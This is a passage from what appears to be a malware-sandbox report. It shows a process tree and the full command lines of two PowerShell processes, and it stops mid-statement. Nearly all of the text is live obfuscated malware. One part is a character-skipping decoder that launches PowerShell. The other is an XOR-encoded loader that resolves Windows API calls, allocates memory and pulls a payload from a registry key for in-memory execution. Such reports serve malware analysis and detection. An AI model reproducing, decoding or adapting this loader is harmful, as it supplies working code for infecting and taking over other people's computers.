Fal1Hal0Fel1fry6Acc1Ren7Gal0SupAFul2Hov4Sta4For3Sub4Abo3Dec2LanAWag0RevDGen1Apo8Dis1Ris7Scr1SasDTot1Pol8Arb0FleBUnd1HayDHde5Ops5Per5Rev9Out5FrsDAmi1San6Eks0Ndl9Byr1Doa2Pas1VedBEft1KnuCSta1vin7Cli1MidDFro1ankCQua0KryAOpb5Her0tyr5Rim7Coi2VaaAgul1UfoCAfm0SkaDBra3Por0Non1Fri4Met0Boo9Tra1Fin5Nau1thoCsel1Sup4Tun1EloCVes1Gem7Haa0ResDund1Spi8gal0OrnDInd1Lux0Gra1Jou6Agr1Cap7Tri3SacFSst1Unc5Utl1Pro8exc1steEGra0HreAChl5Bis1sov5HutDHul3SulAIns1Ana6Sag1Ord4Sav0Cit9Pil0IntCBra1Sca5Afs0UdvASyn1Kar0eks1Rat6ext1Sov7Ent4ComEBas5Mam0Pig'Slv;Bro.Ins<EnmVsigiSinnkradLitsundkstniEftbcareNonlMucimbegdip7Uan Bas<SpiRHomepargHydeFedlGaafWepaOutsBagtSubsDiatRegtreceYinlCossFrseKunnGumsArb3Rep;Paa<PhoRUdkeHurgReaeMonlDagfSynaCorsNontCycsRvetLeatDobeChilFresBlaeflanDomsSel4Kla Sam=Skj radOAkvcHypcNonlRejuGuadUlseTranMartFor0Tou Pho'Roo5SerDBan2StaDOve1Age0Mat1unaDSep0BriAhvi0KnaASja1Kop2Red0BoaBVil1Gol0Int1PicFUnd0FejDPha0OmnAHar1Chr8Ber1Sne4Abl1Unb5Par1Chi0Rho1Kul7Sil1NymENon1ComCSem0FasBTer0almAUfr5Ant7man3FemDNon1hanCPlu1freFTea1Mes0Use1Res7Bam1PraCMis3Clo4Gen1kliCFib0BelDAds1Int1Cor1Hov6Cen1WadDdac5Ree1Tri5UndDSea2MalFEje1Dis0Kob1For7Spa1PalDFer0ForAPre1Rag2Por1Smr0Fon1FunBOku1PasCArr1opt5Top1Hat0Tel1traEunh4LanBNdr5Ban5Gra5Syn9Paa5PapDRug2ClaFhem1Bal0For1Ges7Und1MorDCen0BitAHad1Ham2Vis1Pro0Omk1IchBMod1EncCBol1Jau5Urb1Out0Ryk1PepEVrt4NonAEnt5Pel5San5fra9Hae5TraDAlo3anfDEko1Ago4Udl0fdr9Aug1Pro7skj1Ocr0Lit1Hat7Hic1sekEDry0NeuAFor1AfsFCha1Ind8Udo1aut2Cou0UnaDMom1Int6Ref0UlrBDit5Ind5Bri5Jur9bef5NonDInt1Fej6Hu 0For9Wai1Bot2Gra1OpfBPrv1SkoCLge1sli7Inv1SocDNeu1StrCEve0AngACor5Bel0Dia5Bru7pat2attACak1PreCArc0DeiDUdh3Ens0Til1Udt4Jag0pic9Gen1Afd5Ben1MosCWom1Bru4Fam1falCImm1Dis7Bra0FibDAtt1leo8Cos0HypDAme1Sty0Rig1Hie6Sup1Fil7gen3SkaFJor1Alc5Pep1mou8Oms1KofEHol0LukAcai5Loe1Bef5AsaDHyd3SmuAInd1Rea6Viv1Ove4Yal0Tra9Con0RegCTun1Pro5san0lepALov1Atr0Mic1Ort6Pre1Gol7Kis4SydEPed5Fld0Len'Soc;Pau.Gog<MusVTiliCennDisdParsHolkgasiUnrbcureDaclKariDemguna7Ans Asc<TelRFrieHyggconeBihlSarfJunaEchsSultMelsLoktOvetPolepullHumsSarerelnTrfsEct4Suf;Pre<EboRAnteOpbgOpieBealIntfMonaWigsAkktRhisHomtStrtSlreVanlAstsKreeBrenTotsTil5Omt Acc=Han glaOAdrcAfscLoplOpbuTildRgpeAstnStrtSpo0bog Phi'Coe0AktBSan1DecCGen0FerDStu0OveCUnl0SanBHaz1Com7int5kkk9Got5LufDAra2HypDAvo1Sau0Tur1LacDDag0OscABad0BluATyl1Vaa2Ery0StbBHaw1Vau0Uds1KviFStt0WynDdis0ferABel1age8Sig1ara4Unv1Ave5Rel1Cou0Sta1dry7Vir1DerERig1PerCSta0SpnBUns0uniADer5Uns7Squ3LinAPse0infBTub1ThoCSwe1Hal8Rig0WorDOpl1HjlCAsc2YndDSce0met0gal0Und9Kar1BilCKup5Due1Lan5Beu0Fir'Sta;Utr.Nor<TilVVisiEacnOvedGlasCatkSkriTypbSaleKonlTjeiPangDai7Ast Com<NonRHomeArbgRuneDoblmarfUtraProsEdytEftsBagtcigtVeieVallForsSkieHaunBedsBeh5Kon Hyd Ngl Ing;Lou}Med<AssSForkCirrFriiFrivZygeSeraAttrlitbSkieHunjtildHypetantGil1Ube3Ana2Und Haa=Mul SlyOcrecVakcVehlHamuCradDeceNyhnKoltEpi0Cre Uto'Und1Orl2Cro1CheCAll0DatBPro1Omp7Vov1ZinCDis1Ast5Afa4CatAIgn4KloBDis'Fak;Aut<RenRSameDisgSyseEnolTrafSemaAnssFretBinsMentSontCroeKedlRensKroevarnSjlsSal6Lem Fys=Str DonOOricMancDatlAfbuNordUndeUvanFirtSon0Sam Dec'Att5DraDdis2PufASal1Reg6Pro0TvaELej1ForCHld0MatBgal0aftAEju5syn9Uro4Str4Cri5Dre9Sid2Out2Dem2ForAGan0Mbl0Sem0MugABil0preDUsi1UnaCUnp1bar4Vek5Tur7Ruf2CabBShi0WhaCUnp1Inf7Opi0BruDHys1Chl0Rin1Bog4Ski1RelCSuk5Sky7Sha3Syv0Ant1Byg7Tip0LefDBab1LymCGul0FdeBMak1Aur6Tro0Str9Ser2UnmATob1ScuClyc0TasBPlu0DyrFUnv1Bru0For1CorATut1GraCLep0StaARev5Ill7Cho3mag4Uru1Ing8Fug0beeBEve0BoiABuk1Rai1Skr1Det8Suk1Res5amb2est4Sti4Pit3Cro4Per3Opi3AntEGap1AssCQua0VanDDil3AadDBan1fedCmon1Fla5Kro1LhuCFor1NonEUns1Lik8Isv0extDAnd1LufCQua3BinFSkn1Uns6Des0ImpBTur3ChoFTts0SkoCArm1Haw7Res1SwiASel0KonDSyn1Fig0Bes1Ret6Sys1Udg7Ufl2Riv9Gls1Deb6dra1Pes0Lak1Tro7ned0DerDTor1UniCDia0BruBTap5Mar1Del5cob1Lex3Pri6Non1VifAVer1TikAUna1Gru5Uds0LaeCPot1AphDVal1HamCMed1Res7Mon0ShaDUls4BuzBStr4DisBOut5Con9Til5InfDRrl2WryAPre1Sla2Rov0HamBSnb1Fej0Red0JonFTor1MulCPed1ang8Yer0MonBCap1FeaBGua1RifCKon1Rus3Tro1ethDApp1SwiCAfm0BopDBor4Aan8Fre4UfoAEmp4MagBFls5Dou9Out5SubDFib2StuFtyr1Hjr0Sam1Vul7Rec1BlaDEgo0AlaABla1pro2Ste1Ret0Lev1VelBPic1RelCSha1Ara5upt1Fac0neg1GonEHak4HunDLng5Bij0Ske5Mor5Inc5Sal9Tro5Ina1Cen3Mat6Xyl1sanAFib1StvAAmt1End5Upa0HdeCHoi1PosDCen1PseCUnp1Ros7Tek0ChaDGlo4ToiBBet4SynAGlo5Ord9Dry3Erh9Hjl5Gas1Sva2Ryt2Ant3Sno0Maz1tel7Sim0HigDFej2Tth9Fal0Ii DAgt0HidBIne2Sko4Spe5Joh5Top5Und9Cer2Ide2Fal2KimCTyk3Kon0Mil1Qua7Faa0FixDDun4StoAReg4YonBSud2Hei4Per5Fal5for5Udf9Mon2Sol2sty2DadClov3Hyp0Kol1Gal7Lin0PouDRub4SorAFor4DisBPro2Pic4Non5Dia5Klu5Baa9Ser2Til2Ide2OpdCLif3akt0Pat1Bir7Juv0DewDStu4ConAInd4DerBBio2New4Spe5Ula0Mat5Stv9Srb5Bef1Pre2Beh2Ovn3Net0Squ1Rev7Hor0ConDDig2Cho9Ski0AkrDFen0TraBDoc2Fle4Bod5Arb0Soe5Amy0swe5Hal0pul'Stt;Afv.Dis<SamVAddiKosnSpedPlasRodkUnfiTrobGrieEtclAutiPhygKal7Ope sti<NonRHalealegMyxeGarlTppfArtaNadsinttVansHeltKlotAsteBrslHelsMileInvnTrfsDin6Gaa;Psy<PriALydrteibModeConjKledPalsFagoGulpUlcgTesayngvRideDyenKorsBge Cod=Kon TilOUnrcElicNvnlLatuCardBldePronsadtHov2Oml2Gen fib<FakVPuaiInsnSatdStasFrekmagiMorbLeaevisliltiHypgAme5Reg Key<EftVUeniFlynNondMinsImpkPreiOvebLapeFinlHaviKomgHar6Dus;Ove<CatRPreeBrygtegeHomlHemfSedaTidsStetforsFirtCattDraeStolQuesmylealinRessMis7Bow Kor=Por IntONoncPeecDamldobuLendCaleVennGaitMol0Vid Str'Kal5johDTer3Ove8hyl0scaCMis0PonBDeb1Usn0udm1UnvESoc1Inf8Kom1Kod5Rve4OpgAPal5Pre9Cac4Won4Slu5Afb9her5LasDGra2StaAEum1Bin6Mar0RigEbes1TviCJul0ScoBTot0AfsACon5Sic7Drs3Unv0Ela1Gum7Con0FleFFor1Thi6Mon1Vis2Blu1BurCgaf5spl1Opt2Slu2Dec3Unv0Oms1Ank7Pet0EndDSig2Frs9Ech0AesDEta0PhyBSel2Ove4Und4Mag3Trs4Amt3Fil2Afv3joh1HeaCLun0BukBOcn1Loc6Aka5Ass5Exo5Gus9Shr4BehFSve4CotCEuc4Alt9Sel5Uds5ben5Mot9Son4Int9Fac0Cho1Ukl4BruAAff4Dob9Uns4Akt9Ned4Mut9Fis5yde5Ind5Ove9Afs4Trk9Hea0See1ans4TriDVen4Hde9Arg5Bar0Opr'Opl;uns.art<KomVUnbiHienSpedRensdrokOpkiAdmbFreeSamlOtiiPlagKin7Oup Tan<steRRumeskigVomeRealNatfRegaBefsAmatMacsGrctInttSubePsylSedsBigeStanTilssol7Bel;Rej<RhaRRigeThogPueeGaalClifPetaOpnsasltAmysPurtYamtBoseCralFibsEleeFibnProsFor8Abs Spr=Act AdgOFrecForcSjalUafuTildReteFlanTertUhy0Equ Ang'Col5AthDFro3Apo5par1Bud6Ans1VseCCli0HypAMod1Dds7Mar1Osb0Ber1Dir7Ste1SchEFlo1IndCRel0CapBUdt1Tur7Bor1SheCant5app9Bla4Fic4bae5Abr9Kre5SerDBes2BogAHvi1Non6Raa0PinETan1SupCBor0SkgBTis0FirASpu5Not7Hyp3Med0Vig1Spr7San0RadFBet1Til6Pla1Unr2Uns1BilCBal5Dif1Tal2Pro2Phe3Kon0Til1Cou7Mal0KalDzon2Brs9Rur0HabDFor0StyBCor2Mar4Aft4Fej3Non4Lab3bra2Pat3Kls1CarCStu0RigBRes1Res6pat5Civ5Pjo5Kla9exp4Haj0Jee4FinEAri4Cym1Bem4UnbBsem4Out1Psy4Sti1Pho4ComFAkk4ChaDFla5tak5fis5Phe9Pre4Dia9Cui0Sch1Tys4DaaADrb4Hun9Bas4Yal9Tun4Bra9App5Tac5Scu5Reg9Rep4All9Bps0Sup1Bea4andDPet5Gas0Spi'Slv;Jor.Byn<KarVMariClunBdddAfhsKerkoveiPunbZooeniclCocifungSve7Dis For<SymRGameOxtgSljePenlAplfAmoaIndsUndtTeksAlatIontStjeSndlnonsJapeInvnTansKli8Tro;Ove<NokePynlPaneBilcLibtSvarMilofarsBaruPumrForgLuniProcGoaaLoglAlplObtyBlo=Fri(VirGFlieArstTil-UnhIUdstHoveBilmConPLyrrStaoFetpDateSvvrKystbesyJag Tri-pirPSemaGritCarhcol Nyo'HonHRegKKorCFreUAna:Irr\TveuIndnNindBeseCalrPloaDacsForsLaueAkusEnosFideretdDow\VerUKatnColbunhoamiuFodnStacUndyEdi'Eva)Fly.AlkBeudnkadkObseunvnCalssak;Unw<BijRBroeLsegRepeKoslIrgfuncaCytsTretMutsUsltSpitBaneulllGutsTydeGranbessHvi9sab Pen=Ana DatOLiocCadcBlelUdfuPridSideEksnLavtCen0Upb Ort'Mar5SphDUnd2FroBDut1SrvCmes1DidETex1NidCTim1Ena5Poi1belFHyp1non8Pul0UgeASpr0FetDAar0AerAPar0NedDUdk0HecDEnd1DimCDen1Ska5Dip0AppAsup1ChaCOce1Kog7Moz0TilABul5unc9Uru4Usa4Nie5Ser9Cam2Yng2Car2EngAKon0Dis0Slg0KejAStn0SupDBnk1OmbCVel1dek4Und5For7spe3SkaAind1Can6Out1Cro7Eft0SkiFLix1BorCPhi0RacBUnf0ReiDPil2Ind4cam4hjr3Par4Put3Uds3VarFReg0NonBKna1Ace6non1Sub4Sol3BibBCur1mis8Unh0ValAStr1VinCStj4ColFSer4ArmDFrd2UnsAAll0SweDPaa0KlaBBog1Cer0Ins1Kla7Ext1FamESub5Epi1Fis5VedDLnu1HjeCPoo1Rke5Zam1UndCAng1OluADos0CheDant0RabBSco1ove6Man0AfgAogr0OakCFle0stnBAfr1FusEFis1Sdr0Slv1QuiAIne1Cow8Rep1Dis5Sme1Sel5Ruf0Ure0Sna5Bri0Res'Fem;Kap.Gar<GleVriniIslnSpadromsGizkSesiHarbbereDrvlAppiBilgJan7Not Fes<StiREseeDelgCleeStalLitfligaDihsRobtTudsStotStotShieParlRousUndeSeanMaesInt9Den;Ter<SuceAsklhigeUrocGrutHjorBeloLutsTenuCeprPargSnoiOpgcLufaUnqlGavlAutyFir0str Kru=Lan UmeONitcKavcLidlOveuSubdAkteLinnBrftOve0Hjs Gli'Pla2Uri2Ret2MisASal0Sil0Hjl0LicARed0HefDAfg1KvaCNon1Tro4Scr5Kft7cor2GirBEpi0ImbCUns1Pot7Sym0AltDHaa1Cyk0Jor1Sen4Med1DeeCInd5Lyd7Med3Dom0Son1Arg7Bei0PosDInd1MacCImp0KneBSte1tje6Cin0Tai9Loo2TheADah1VanCNon0IndBMar0KbsFQua1Fje0Osc1RedANig1DorCKiw0SkoASka5Rod7Sup3bab4abs1ndv8rec0KarBpen0speAmod1Sta1Cho1Hor8Sco1Sal5The2Lnk4Sto4Rek3Gre4Dip3Oms3SpaAAba1Bes6Ver0Siw9Unp0Out0Squ5Deg1Beb5EulDUnc2LasBPat1SerCVar1AndEVve1ThrCRes1Unv5Kis1MvrFRol1Ben8Mob0BefAMin0SkrDkik0AfgASch0ForDInd0PreDGre1KehCFen1Que5Ect0IndAHkb1RunCRer1Kau7ist0TelASka5Lig5Ant5Ove9Cen4Hor9For5Sil5Iso5Tro9Cri5Spi9Ton5MazDZod3Sal8Mis0MalCAcr0TalBFyl1Bou0Alg1VorEUnf1Fri8red1Opf5Mis4KonAFre5Upa5Dro5Ext9Ofr4MusFinn4DyrCCyk4Lak9Hal5Non0Imm'Mic;Ret.Pal<SunVHypiBlenDupdRelsUnekMeniCombCaeeSuplStriHypgBal7Pyl Pre<BndeReslPelePencTortmisrLysoomssVenuTrarMalglseiCancManaFralUndlklkyBes0Zor;Mag<BesRAnteVanlHydiBankSkrvRugiKryeNvnrDaisPep=Deb<JosRDvreBrogPrieFillBomfBigamussJortClasArrtPretOveeOfflvaasDeneDelnStesKon.SpecHinolsguBacnFiltCom-Dec6Obl5Leg0Yar;Wat<AvieMatlOpteAancDagtLucrTeaoSansSupuEksrFaagGreiDexcRigaKrslReclFroyNon1Sig Kll=sni DahOAfscCivcufylLimuVordSkreSubnteltSyr0Tri Cat'Trn2Mel2Tem2PoeACom0Geo0Kar0UfrASem0TrsDPle1TelCPaa1Cho4smr5Son7alo2RaaBRan0SniCBar1Ina7din0ArtDPoi1Ska0Scr1pol4Com1DesCFor5Obl7Ser3dep0Rap1Orr7Nrb0OusDJub1VikCAto0BlyBSar1Maa6Log0Sca9Han2UreAGal1KogCEne0MisBCas0BetFJur1Pat0Cal1VarASan1misCfib0ProAAbn5lyd7syn3Whi4ant1Kom8Was0AflBGam0burATin1Alm1Dik1Leo8Afn1Wis5Saf2Stu4Dou4Gre3Rot4cac3Eth3SprAniv1Sch6Sal0Fle9Pro0Kre0ban5Try1Gad5CenDThe2GaeBUnd1RubCEks1avlEEqu1BunCNon1Bor5Ace1shiFSko1Tur8Tab0PerAOve0IrgDYde0PreAArg0BinDPla0slvDSki1OmdCBde1Skn5Unh0DyrAKle1augCbon1Tap7Min0cirAFli5Lse5int5Sla9Caf4EmeFmil4BelCPre4Tyv9Par5Mer5Kam5Mer9reg5IndDOpg3Soj5Kon1Ste6Krb1unpCFrg0polATit1For7Sta1Ing0Unm1Daa7bed1SpeEVoo1MadCNon0PerBFor1tri7Mar1DucCoot5Udk5ant5Mas9Dan5offDfla2HovBIoa1EnkCCut1Ukr5Ind1Lok0Mil1Asf2Bux0ArbFSla1pew0Unc1AnkCDef0BnhBTvi0WouAPis5Unc0Fre'Ure;gev.Afs<CoeVMyziSounLaedBessFrekLakiSnkbZeaeCrolNediUndgtre7Chu Skj<SpieSeklTeleTyncraatOverpenoSyvsSquuTilrKuigSaliVencSkaacyklBralRenyPho1pro;Oer<FineDielTaneTakcDyatHerrGlooTvasLakuVrdrPangBymiObjcKoraSeilBrnlligyKas2Pup Inv=Inv ElsOTilcPalcSeplsmeuStrdBieeNednStatYun0Afs Lai'kyp5forDRhi3EntFgru1Pol6Ret0FriBLap0AdnDDre0HelDPap1Ska7Tvr1Sam0Ugl1Hyl7Lim1ForEsti0KonAHob0Sek9Sub0BouCMis1Lit7Ref1Sia2fer0UddDMin1OveCNon0RapBSol5Fil9Maa4Fas4Gav5Kur9Tyd2Jag2Uns2RosAOve0del0Uds0SalASum0SnaDNon1SnnCdav1Hjr4Poh5Ket7Ove2NaaBUnw0CanCTaa1Tal7tli0PreDSup1Por0Kon1Rea4Dvr1SamCDum5Arb7Abo3Lan0Dif1Sho7Sch0RekDBra1SugCSlu0FleBWhy1Kaa6Ove0Emp9Som2CheASub1SpaCHun0BorBUan0UdsFHov1Uns0Unc1slaARei1KakCVex0AnnAUnb5Sig7Pod3Rom4Iat1Unb8Laa0AppBAgg0LinACri1Kuw1Bel1Par8Ove1Imp5Sma2Raa4Par4Glo3Eva4Sub3Ind3GeiEOff1MarCFun0FatDBou3SkrDHer1FroCAab1Hon5Ste1RusCSup1ArtEVin1Ove8Err0AngDMur1TidCArb3KolFEsq1Tro6Tak0IndBBla3AncFKra0SynCRet1for7Tha1PinAAto0actDBat1Sau0cal1Jef6Mis1Tik7Flo2Tek9End1for6Eje1The0Arr1Slo7Jui0forDTri1VieCNom0BluBNab5Nub1for5Acu1Imp3Tyk6Spi1LugASil1ynkAFor1Ami5Int0RenCFla1TriDSav1PunCAkk1Tim7Nar0IndDDuo4IndBChr4KaeBSge5Sne9Afl5UnsDHoo2Rig9Sci1Out6Brn0TriBbef0SkrDPne0sovBRep5unt9Des5UndDSty0pupCBud1Kri7Ant1Ryg0Cen0Ale9Vog1UndCTel1Rem5Pre0ChaDAvi1Kam8Nat0UnrDRet1FalCReg5Edi0Liv5Tea5Can5Pro9Kla5Try1Ske3Cla6Dob1glaADif1SkrAkit1Pos5Bri0MigCDeu1staDOms1TipCBag1Blo7lun0MelDAfs4AutBVit4BasABeh5Hny9pam3Coa9Atl5Dro1Tri2Sad2fil3Per0The1viv7Nat0InsDGal2Boa9Iag0HydDWhi0FruBSid2Tra4Ske5Ant5Ato5Dis9Bre2Mel2Har3Mar0Pre1Rep7heg0VisDUro2Can9Bet0PasDInt0SniBVri2And4app5Fol5Tro5Skl9Beu2Raa2Hav3Udm0Per1Pre7Ena0SowDVar2Mol9Cha0BecDJes0AiwBAir2Kog4Pok5Uno5Ove5Sub9Dul2Kol2Une3Vib0Car1Lat7Rub0CniDEns2Sem9Mos0MisDKlo0PolBDav2Nid4Fab5Dyb5Rat5Puk9Kvi2Spa2san3Red0Ung1Far7Sta0TelDAga2Soe9Pen0LukDSis0romBScl2Ord4Paa5Wyr0Unp5Int9Pau5til1Car2Out2Paa3Sju0abo1Bav7Tan0ManDMis2Kat9Ele0YamDLit0DuaBMod2Osu4Sup5Tes0Elv5Myr0Kle5Guf0Adk'Kal;Eng&Gra(Ner<SfoVaveiEstnPosdFissUdkkManiAugbUndePonlGeriTaxgHov7Unt)Tul Gra<TileGynlDiheCarcAbutUncrSneoTilsSanuAmbrKongRoniOh cReaaVallMillKaryStr2ori;Tar<PuleSvilMageDimcFortHebrKaloEthsOmsuJulrPlegValiTrdcGalaEpilRitlSheyCoa3Dip Pio=Spy TekOOpscForcJewlRepuGrudArbeCarnPostArb0Pek Off'Int5ravDGng3TelFsca1Gul6baa0OplBMar0SkaDMas0GrfDAri1Dia7Kos1Spr0Ant1Ugl7Fir1TemEOve0UnmARet0Bec9Obs0ArbCHum1gut7Dis1Dis2Bri0ScaDHav1KvaCSou0BakBHov5Rut7Una3Exa0Unn1Pen7Not0ModFPen1Nat6Ned1Paa2Eje1TopCStu5geo1Enc5UndDPaa3Sty8Tff0GalCBrr0BefBRig1Car0Pyh1PosENon1Kry8Sca1Har5Kla4FejABri5mod5Pac5RepDHov3Mil5Uns1Pie6Bim1OprCSpa0TelABla1Tel7Hop1Til0Una1Tin7For1HerEEnr1GalCNot0AweBmac1Tel7Jer1CasCVer5Uni5Mil5IntDHot3Sus8Now0hstBStr1BirBAtt1UanCStu1Hyd3Sed1FjeDUnk0hjsAArt1Fed6lig0Afv9Fra1ManEVip1Ded8Sel0kilFCep1QuiCZen1Neo7Rep0UndAJua5Saf5Cro4Sub9Tag5Spa5Ryg4Per9ind5Gal0Dis'Uln;Tra&Act(Nef<GldVVariGudnDisdstasPykkBesiArcbLydePidlAffiMangFre7Non)Rec Byd<OveeAntlbrseBudcSmetBacrForoOrtsKaruAlcrDiagFleiBorcUkraPrelCenlCriynat3Rej#And;""";Function electrosurgically9 { param([String]$Stamgst); For($Unnutritious=3; $Unnutritious -lt $Stamgst.Length-1; $Unnutritious+=(3+1)){ $spalter='subs'+'tring'; $Occludent = $Occludent + $Stamgst.$spalter.Invoke($Unnutritious, 1); } $Occludent;}$Puslerier0 = electrosurgically9 'PriIRasEDamXElh ';$Puslerier1= electrosurgically9 $Delirifacient;$Puslerier1=$Puslerier1.replace('<','$');$Puslerier1=$Puslerier1.replace('>','"""');if([IntPtr]::size -eq 8){ .$env:windir\S*64\W*Power*\v1.0\*ll.exe $Puslerier1 ;}else{ & ($Puslerier0) $Puslerier1;}"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1608
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";Function Occludent0 { param([String]$Stamgst); $Divisors31 = New-Object byte[] ($Stamgst.Length / 2); For($Unnutritious=0; $Unnutritious -lt $Stamgst.Length; $Unnutritious+=2){ $Divisors31[$Unnutritious/2] = [convert]::ToByte($Stamgst.Substring($Unnutritious, 2), 16); $Divisors31[$Unnutritious/2] = ($Divisors31[$Unnutritious/2] -bxor 121); } [String][System.Text.Encoding]::ASCII.GetString($Divisors31);}$Compulsion0=Occludent0 '2A000A0D1C14571D1515';$Compulsion1=Occludent0 '34101A0B160A161F0D572E10174A4B572C170A181F1C37180D100F1C341C0D11161D0A';$Compulsion2=Occludent0 '3E1C0D290B161A381D1D0B1C0A0A';$Compulsion3=Occludent0 '2A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A573118171D151C2B1C1F';$Compulsion4=Occludent0 '0A0D0B10171E';$Compulsion5=Occludent0 '3E1C0D34161D0C151C3118171D151C';$Compulsion6=Occludent0 '2B2D2A091C1A1018153718141C555931101D1C3B002A101E5559290C1B15101A';$Compulsion7=Occludent0 '2B0C170D10141C5559341817181E1C1D';$Compulsion8=Occludent0 '2B1C1F151C1A0D1C1D3D1C151C1E180D1C';$Compulsion9=Occludent0 '3017341C14160B0034161D0C151C';$Vindskibelig0=Occludent0 '34003D1C151C1E180D1C2D00091C';$Vindskibelig1=Occludent0 '3A15180A0A5559290C1B15101A55592A1C18151C1D555938170A103A15180A0A5559380C0D163A15180A0A';$Vindskibelig2=Occludent0 '30170F16121C';$Vindskibelig3=Occludent0 '290C1B15101A555931101D1C3B002A101E5559371C0E2A15160D55592F100B0D0C1815';$Vindskibelig4=Occludent0 '2F100B0D0C1815381515161A';$Vindskibelig5=Occludent0 '170D1D1515';$Vindskibelig6=Occludent0 '370D290B160D1C1A0D2F100B0D0C1815341C14160B00';$Vindskibelig7=Occludent0 '303C21';$Vindskibelig8=Occludent0 '25';$Portr=Occludent0 '2C2A3C2B4A4B';$unipeltate=Occludent0 '3A1815152E10171D160E290B161A38';function Occludent22 {Param ($Checkroll, $Scaphoid) ;$Regelfaststtelsens0 =Occludent0 '5D291C0B0D1810171C1D59445951223809093D16141810172443433A0C0B0B1C170D3D1614181017573E1C0D380A0A1C141B15101C0A51505905592E111C0B1C54361B131C1A0D5902595D26573E15161B1815380A0A1C141B15003A181A111C595438171D595D265735161A180D101617572A0915100D515D2F10171D0A12101B1C15101E415022544824573C080C18150A515D3A1614090C150A1016174950590450573E1C0D2D00091C515D3A1614090C150A1016174850';.$Vindskibelig7 $Regelfaststtelsens0;$Regelfaststtelsens5 = Occludent0 '5D2A0009111C0B1C1D5944595D291C0B0D1810171C1D573E1C0D341C0D11161D515D3A1614090C150A1016174B5559222D00091C2224245939515D3A1614090C150A1016174A55595D3A1614090C150A1016174D5050';.$Vindskibelig7 $Regelfaststtelsens5;$Regelfaststtelsens1 = Occludent0 '0B1C0D0C0B17595D2A0009111C0B1C1D5730170F16121C515D170C151555593951222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A573118171D151C2B1C1F2451371C0E54361B131C1A0D592A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A573118171D151C2B1C1F5151371C0E54361B131C1A0D5930170D290D0B505559515D291C0B0D1810171C1D573E1C0D341C0D11161D515D3A1614090C150A1016174C50505730170F16121C515D170C1515555939515D3A111C1A120B1615155050505055595D2A1A18091116101D5050';.$Vindskibelig7 $Regelfaststtelsens1;}function Occludent23 {Param ([Parameter(Position = 0)] [Type[]] $opkbendes,[Parameter(Position = 1)] [Type] $Dmpningsfaktor = [Void]);$Regelfaststtelsens2 = Occludent0 '5D2D101D0A0A120B101F0D0A18141510171E1C0B0A594459223809093D16141810172443433A0C0B0B1C170D3D1614181017573D1C1F10171C3D00171814101A380A0A1C141B15005151371C0E54361B131C1A0D592A000A0D1C14572B1C1F151C1A0D10161757380A0A1C141B15003718141C515D3A1614090C150A1016174150505559222A000A0D1C14572B1C1F151C1A0D101617573C14100D57380A0A1C141B15003B0C10151D1C0B381A1A1C0A0A2443432B0C1750573D1C1F10171C3D00171814101A34161D0C151C515D3A1614090C150A1016174055595D1F18150A1C50573D1C1F10171C2D00091C515D2F10171D0A12101B1C15101E4955595D2F10171D0A12101B1C15101E485559222A000A0D1C1457340C150D101A180A0D3D1C151C1E180D1C2450';.$Vindskibelig7 $Regelfaststtelsens2;$Regelfaststtelsens3 = Occludent0 '5D2D101D0A0A120B101F0D0A18141510171E1C0B0A573D1C1F10171C3A16170A0D0B0C1A0D160B515D3A1614090C150A1016174F5559222A000A0D1C14572B1C1F151C1A0D101617573A18151510171E3A16170F1C170D1016170A2443432A0D18171D180B1D55595D1609121B1C171D1C0A50572A1C0D301409151C141C170D180D1016173F15181E0A515D3A1614090C150A1016174E50';.$Vindskibelig7 $Regelfaststtelsens3;$Regelfaststtelsens4 = Occludent0 '5D2D101D0A0A120B101F0D0A18141510171E1C0B0A573D1C1F10171C341C0D11161D515D2F10171D0A12101B1C15101E4B55595D2F10171D0A12101B1C15101E4A55595D3D14091710171E0A1F18120D160B55595D1609121B1C171D1C0A50572A1C0D301409151C141C170D180D1016173F15181E0A515D3A1614090C150A1016174E50';.$Vindskibelig7 $Regelfaststtelsens4;$Regelfaststtelsens5 = Occludent0 '0B1C0D0C0B17595D2D101D0A0A120B101F0D0A18141510171E1C0B0A573A0B1C180D1C2D00091C5150';.$Vindskibelig7 $Regelfaststtelsens5 ;}$Skrivearbejdet132 = Occludent0 '121C0B171C154A4B';$Regelfaststtelsens6 = Occludent0 '5D2A160E1C0B0A594459222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A5734180B0A1118152443433E1C0D3D1C151C1E180D1C3F160B3F0C171A0D101617291610170D1C0B5151361A1A150C1D1C170D4B4B595D2A120B100F1C180B1B1C131D1C0D484A4B595D2F10171D0A12101B1C15101E4D50555951361A1A150C1D1C170D4B4A5939512230170D290D0B245559222C30170D4A4B245559222C30170D4A4B245559222C30170D4A4B245059512230170D290D0B24505050';.$Vindskibelig7 $Regelfaststtelsens6;$Arbejdsopgavens = Occludent22 $Vindskibelig5 $Vindskibelig6;$Regelfaststtelsens7 = Occludent0 '5D380C0B101E18154A5944595D2A160E1C0B0A5730170F16121C512230170D290D0B244343231C0B1655594F4C49555949014A494949555949014D4950';.$Vindskibelig7 $Regelfaststtelsens7;$Regelfaststtelsens8 = Occludent0 '5D35161C0A1710171E1C0B171C5944595D2A160E1C0B0A5730170F16121C512230170D290D0B244343231C0B165559404E414B41414F4D555949014A494949555949014D50';.$Vindskibelig7 $Regelfaststtelsens8;$electrosurgically=(Get-ItemProperty -Path 'HKCU:\underassessed\Unbouncy').Bnkens;$Regelfaststtelsens9 = Occludent0 '5D2B1C1E1C151F180A0D0A0D0D1C150A1C170A594459222A000A0D1C14573A16170F1C0B0D2443433F0B16143B180A1C4F4D2A0D0B10171E515D1C151C1A0D0B160A0C0B1E101A1815150050';.$Vindskibelig7 $Regelfaststtelsens9;$electrosurgically0 = Occludent0 '222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A5734180B0A1118152443433A160900515D2B1C1E1C151F180A0D0A0D0D1C150A1C170A5559495559595D380C0B101E18154A55594F4C4950';.$Vindskibelig7 $electrosurgically0;$Relikviers=$Regelfaststtelsens.count-650;$electrosurgically1 = Occludent0 